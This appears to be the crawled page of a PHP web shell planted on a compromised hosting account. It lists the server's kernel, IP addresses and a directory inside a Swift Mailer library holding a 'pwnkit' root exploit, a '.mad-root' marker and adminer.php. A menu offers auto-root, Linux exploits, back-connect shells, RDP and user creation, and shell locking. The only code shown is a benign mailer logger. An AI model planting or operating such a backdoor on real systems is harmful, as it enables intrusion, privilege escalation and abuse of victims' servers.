Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.145
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
swift /
Swift /
Log /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
DefaultLog.php
1.37
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
index.php
1.24
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DefaultLog.php
<?php /** * Swift Mailer Default Logger * Please read the LICENSE file * @copyright Chris Corbyn <chris@w3style.co.uk> * @author Chris Corbyn <chris@w3style.co.uk> * @package Swift_Log * @license GNU Lesser General Public License */ require_once dirname(__FILE__) . "/../ClassLoader.php"; Swift_ClassLoader::load("Swift_Log"); /** * The Default Logger class * @package Swift_Log * @author Chris Corbyn <chris@w3style.co.uk> */ class Swift_Log_DefaultLog extends Swift_Log { /** * Lines in the log * @var array */ protected $entries = array(); /** * Add a log entry * @param string The text for this entry * @param string The label for the type of entry */ public function add($text, $type = self::NORMAL) { $this->entries[] = $type . " " . $text; if ($this->getMaxSize() > 0) $this->entries = array_slice($this->entries, (-1 * $this->getMaxSize())); } /** * Dump the contents of the log to the browser. * @param boolean True if the string should be returned rather than output. */ public function dump($return_only=false) { $ret = implode("\n", $this->entries); if (!$return_only) echo $ret; else return $ret; } /** * Empty the log */ public function clear() { $this->failedRecipients = null; $this->failedRecipients = array(); $this->entries = null; $this->entries = array(); } }
Close